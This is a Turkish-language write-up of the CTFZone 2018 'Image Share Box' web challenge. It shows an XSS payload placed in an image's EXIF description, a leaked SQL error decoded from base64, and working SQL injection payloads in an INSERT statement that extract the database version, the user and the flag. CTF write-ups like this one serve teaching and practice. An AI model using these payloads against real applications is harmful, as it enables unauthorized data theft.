<!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Image Share Box - CTFZone 2018 | anal.school</title><meta name="description" content="bir çeşit ilim evi"><meta name="twitter:card" content="summary"><meta name="twitter:title" content="Image Share Box - CTFZone 2018 | anal.school"><meta name="twitter:description" content="bir çeşit ilim evi"><meta name="twitter:image" content="https://anal.school/img/twit-banner.webp"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-118381182-2"></script><script>window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-118381182-2');</script><link rel="stylesheet" href="/css/arknights.css"><link rel="stylesheet" href="https://cdn.bootcdn.net/ajax/libs/highlight.js/10.1.2/styles/atom-one-dark-reasonable.min.css"><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
 font-display: swap;
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
 font-display: swap;
}</style><meta name="generator" content="Hexo 5.2.0"></head><body><header><nav><a href="/">Home</a><a href="/archives/">Archives</a><a href="/about/">About</a></nav></header><main><article><div id="post-bg"><div id="post-title"><div id="post-info"><span>date:<time datetime="2018-07-22T22:02:11.000Z" id="date"> 2018-07-23</time></span><br><span>updated:<time datetime="2020-12-11T13:15:18.407Z" id="updated"> 2020-12-11</time></span></div><h1>Image Share Box - CTFZone 2018</h1><hr></div><div id="post-content"><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plain">We created a new cool service that allows you to share your images with everyone (it&#39;s on beta now)! The only thing you need to share something is an Image Description!<br>Happy sharing!<br><br>https:&#x2F;&#x2F;img.ctf.bz<br></code></pre></td></tr></table></figure>

<p>Link’e gittik ve karşımıza böyle bir sayfa geldi</p>
<p><img src="1.png"></p>
<p>Dropbox ile giriş yaptık, resim görüntüleme ve resim upload olmak üzere 2 adet sayfa vardı.</p>
<p><img src="2.png"></p>
<p><img src="3.png"></p>
<p>Resim yüklemeye çalıştığımız zaman description’u olmadığını dile getiriyordu</p>
<p><img src="4.png"></p>
<p><strong>EXIF</strong>‘te ki <strong>Image description</strong> kısmından bashediyor olabilir mi dedik ve <strong>XSS</strong> payload’u koyalım dedik.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">lorem&quot; onload&#x3D;&quot;eval(&#39;debugger;&#39;)<br></code></pre></td></tr></table></figure>
<p>Fakat bir hata ile karsilastik<br><img src="5.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">Unknown error. Please send this information to admin: <br>imgsbKF9teXNxbF9leGNlcHRpb25zLlByb2dyYW1taW5nRXJyb3IpICgxMDY0LCAiWW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBTUUwgc3ludGF4OyBjaGVjayB0aGUgbWFudWFsIHRoYXQgY29ycmVzcG9uZHMgdG8geW91ciBNeVNRTCBzZXJ2ZXIgdmVyc2lvbiBmb3IgdGhlIHJpZ2h0IHN5bnRheCB0byB1c2UgbmVhciAnZGVidWdnZXI7JyknLCAnaHR0cHM6Ly93d3cuZHJvcGJveC5jb20vcy95bGVlejY1MjczeWR4MjAveHNzLmpwZWc&#x2F;ZGw9MCZyYXc9MScsICcnIGF0IGxpbmUgMSIpIFtTUUw6ICdJTlNFUlQgSU5UTyBgaW1hZ2Vfc2hhcmVzYCAoYG93bmVyYCwgYGRlc2NyaXB0aW9uYCwgYGltYWdlX2xpbmtgLCBgYXBwcm92ZWRgKSBWQUxVRVMgKFwnZGJpZDpBQURPR1FjQkY3Um9lRWtRU3R4YmhnMFlsMW1BaTJPRjA4c1wnLCBcJ2xvcmVtIiBvbmxvYWQ9ImV2YWwoXCdkZWJ1Z2dlcjtcJylcJywgXCdodHRwczovL3d3dy5kcm9wYm94LmNvbS9zL3lsZWV6NjUyNzN5ZHgyMC94c3MuanBlZz9kbD0wJnJhdz0xXCcsIFwnMFwnKSddIChCYWNrZ3JvdW5kIG9uIHRoaXMgZXJyb3IgYXQ6IGh0dHA6Ly9zcWxhbGNoZS5tZS9lL2Y0MDUpc<br></code></pre></td></tr></table></figure>

<p><strong>imgsb</strong>‘den sonraki kısımın <strong>base64</strong>‘olduğu belliydi ve decode ettik.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">(_mysql_exceptions.ProgrammingError) (1064, &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;debugger;&#39;)&#39;, &#39;https:&#x2F;&#x2F;www.dropbox.com&#x2F;s&#x2F;yleez65273ydx20&#x2F;xss.jpeg?dl&#x3D;0&amp;raw&#x3D;1&#39;, &#39;&#39; at line 1&quot;) [SQL: &#39;INSERT INTO &#96;image_shares&#96; (&#96;owner&#96;, &#96;description&#96;, &#96;image_link&#96;, &#96;approved&#96;) VALUES (\&#39;dbid:AADOGQcBF7RoeEkQStxbhg0Yl1mAi2OF08s\&#39;, \&#39;lorem&quot; onload&#x3D;&quot;eval(\&#39;debugger;\&#39;)\&#39;, \&#39;https:&#x2F;&#x2F;www.dropbox.com&#x2F;s&#x2F;yleez65273ydx20&#x2F;xss.jpeg?dl&#x3D;0&amp;raw&#x3D;1\&#39;, \&#39;0\&#39;)&#39;] (Background on this error at: http:&#x2F;&#x2F;sqlalche.me&#x2F;e&#x2F;f405)t<br></code></pre></td></tr></table></figure>

<p>Hatalı sorgu böyle imiş</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">INSERT</span> <span class="hljs-keyword">INTO</span> <span class="hljs-string">`image_shares`</span> (<span class="hljs-string">`owner`</span>, <span class="hljs-string">`description`</span>, <span class="hljs-string">`image_link`</span>, <span class="hljs-string">`approved`</span>) <span class="hljs-keyword">VALUES</span> (<span class="hljs-string">&#x27;dbid:AADOGQcBF7RoeEkQStxbhg0Yl1mAi2OF08s&#x27;</span>, <span class="hljs-string">&#x27;lorem&quot; onload=&quot;eval(&#x27;</span>debugger;&#x27;)&#x27;, &#x27;https://www.dropbox.com/s/yleez65273ydx20/xss.jpeg?dl=0&amp;raw=1&#x27;, &#x27;0&#x27;)<br></code></pre></td></tr></table></figure>

<p>Sorgunun normal halini çıkarttık</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">INSERT</span> <span class="hljs-keyword">INTO</span> <span class="hljs-string">`image_shares`</span> (<span class="hljs-string">`owner`</span>, <span class="hljs-string">`description`</span>, <span class="hljs-string">`image_link`</span>, <span class="hljs-string">`approved`</span>) <span class="hljs-keyword">VALUES</span> (<span class="hljs-string">&#x27;dbid:$owner&#x27;</span>, <span class="hljs-string">&#x27;$description&#x27;</span>, <span class="hljs-string">&#x27;$image_link&#x27;</span>, <span class="hljs-string">&#x27;0&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>Artık <strong>SQL injection</strong> yapabiliriz.</p>
<p>Versiyon bilgisini alalım ilk olarak</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">test&#x27;,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">version</span>()),<span class="hljs-string">&#x27;0&#x27;</span>);<span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure>
<p><img src="6.png"></p>
<p>Sonra kullanıcı bilgisini</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">aciklama&#x27;,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span>()),<span class="hljs-string">&#x27;0&#x27;</span>);<span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure>
<p><img src="7.png"></p>
<p>Daha sonra ise flag’i</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">&#x27;,(<span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">GROUP_CONCAT</span>(owner,<span class="hljs-number">0x3a</span>,description) <span class="hljs-keyword">FROM</span> image_shares <span class="hljs-keyword">AS</span> a <span class="hljs-keyword">WHERE</span> <span class="hljs-keyword">id</span>=<span class="hljs-string">&quot;1&quot;</span>),<span class="hljs-string">&#x27;0&#x27;</span>);<span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure>
<p><img src="8.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">dbid:736b6e6f5070336f26696e6c2b6f657651657a75:ctfzone&#123;b4827d53d3faa0b3d6f20d73df5e280f&#125;<br></code></pre></td></tr></table></figure>

<p>ve flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">ctfzone&#123;b4827d53d3faa0b3d6f20d73df5e280f&#125;<br></code></pre></td></tr></table></figure><div id="paginator"></div></div><div id="post-footer"><hr><a href="/2018/07/23/Piggy-Bank-CTFZone-2018/">← Prev Piggy-Bank - CTFZone 2018</a><span style="color: #fe2"> | </span><a href="/2018/06/28/Cat-Chat-Google-CTF/">Cat-Chat  - Google CTF Next →</a><hr></div><div id="bottom-btn"><a id="to-top" href="#post-title" title="to top">∧</a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="/img/logo.webp" alt="Logo"></a><h1 id="Dr"><a href="/">~nya</a></h1></div><div id="aside-block"></div><footer><nobr>published with&nbsp;<a target="_blank" rel="noopener" href="http://hexo.io">Hexo&nbsp;</a></nobr><wbr><nobr>Theme&nbsp;<a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknight&nbsp;</a></nobr><wbr><nobr>by&nbsp;<a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><script src="/js/arknights.js"></script><script src="https://cdn.bootcdn.net/ajax/libs/highlight.js/10.1.2/highlight.min.js"></script></body></html>